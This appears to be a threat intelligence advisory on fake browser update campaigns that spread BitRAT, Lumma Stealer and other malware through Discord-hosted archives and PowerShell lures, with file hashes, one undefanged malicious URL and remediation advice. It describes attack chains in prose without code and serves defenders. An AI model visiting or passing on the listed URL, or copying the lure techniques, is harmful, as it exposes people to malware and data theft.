Analysis Summary

Cybersecurity researchers have identified a surge in malware infections due to fake web browser updates which are being used to deliver remote access trojans (RATs) like BitRAT and information-stealing malware such as Lumma Stealer.

These attacks often begin when potential victims visit compromised websites that redirect them to fake browser update pages. The bogus pages prompt users to download a ZIP archive file, "Update.zip", hosted on Discord. The ZIP file contains a JavaScript file, "Update.js", which executes PowerShell scripts to download additional malware payloads disguised as PNG image files.

Discord has become a significant vector for these attacks with over 50,000 malicious links distributing various forms of malware, phishing campaigns, and spam over six months. The PowerShell scripts retrieved from these fake updates establish persistence on the victim’s device and utilize a .NET-based loader to deploy BitRAT and Lumma Stealer. BitRAT allows attackers to perform a variety of malicious activities including data harvesting, cryptocurrency mining, and remote control of infected hosts. Lumma Stealer, available for a subscription fee, targets sensitive information from web browsers and crypto wallets.

The cybersecurity firm said that the prevalence of fake browser update lures is increasing as attackers capitalize on the trust users place in familiar software update prompts. These attacks typically utilize drive-by downloads and malvertising techniques. However, a new variant of the ClearFake campaign involves tricking users into manually executing malicious PowerShell code under the guise of a browser update.

Victims are misled into installing a root certificate and running obfuscated PowerShell code that downloads further malware including LummaC2. Lumma Stealer has become one of the most prevalent information stealers alongside RedLine and Raccoon, due to its high success rate in infiltrating systems and exfiltrating sensitive data. Its popularity among cybercriminals surged with logs of stolen data increasing by 110% from Q3 to Q4 2023. This effectiveness is partly due to its ability to evade detection and operate stealthily.

Researchers uncovered a campaign distributing malware through webhards, targeting users with malicious installers for adult games and cracked software. This campaign deploys various malware including Orcus RAT, XMRig miner, 3proxy, and XWorm. Similar attack chains involving pirated software sites lead to the deployment of malware loaders like PrivateLoader and TaskLoader offered as pay-per-install (PPI) services for other cybercriminals.

Moreover, the findings reveal that the CryptoChameleon phishing kit uses DNSPod[.]com nameservers for fast flux evasion techniques allowing rapid cycling through numerous IP addresses linked to a single domain. This tactic enhances the resilience of CryptoChameleon’s infrastructure against traditional countermeasures complicating efforts to combat these persistent threats.

Impact

• Data Exfiltration
• Sensitive Information Theft
• Cryptocurrency Theft

Indicators of Compromise

SHA1

• 38dc0accb9c561c4f2ed9cc565f73a09eb84e81c
• 6356c03b36db395d763c80c49721a7f73330c09e
• a4c7715d910942553a82209bcfea3a0a6abf23cc
• 3acc6e8e675598a41e4a141d60f9339f6aa3a381

URL

• http://chatgpt-app.cloud/q1Vz6N

Remediation

• Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
• Ensure all operating systems and software are up to date with the latest security patches.
• Employ reliable antivirus and antimalware software to detect and block known threats.
• Regularly update these tools to maintain the latest threat intelligence.
• Implement IDPS to detect and prevent unusual network activity, system behavior, or similar threats.
• Enabling two-factor authentication (2FA) on your accounts adds an extra layer of security and can help prevent unauthorized access even if your login credentials have been stolen.
• Regularly backing up your important data can help ensure that you don’t lose any critical information in the event of a malware infection or other data loss event.
• Be wary of emails, attachments, and links from unknown sources. Also, avoid downloading software from untrusted sources or clicking on suspicious ads or pop-ups.
• Use email filtering solutions to block malicious attachments and links that may deliver malware to users via phishing emails.
• Segment your network to limit lateral movement for attackers.
• Employ application whitelisting to only allow approved software to run on systems, reducing the risk of unauthorized applications being executed.
• Implement robust monitoring solutions to detect any unusual or suspicious activities, such as unauthorized access attempts or data exfiltration. Establish an effective incident response plan to respond to and mitigate any potential breaches quickly.
• Make sure all of your software, including your operating system and applications, is up-to-date with the latest security patches. This can help prevent vulnerabilities that info-stealers and other types of malware could exploit.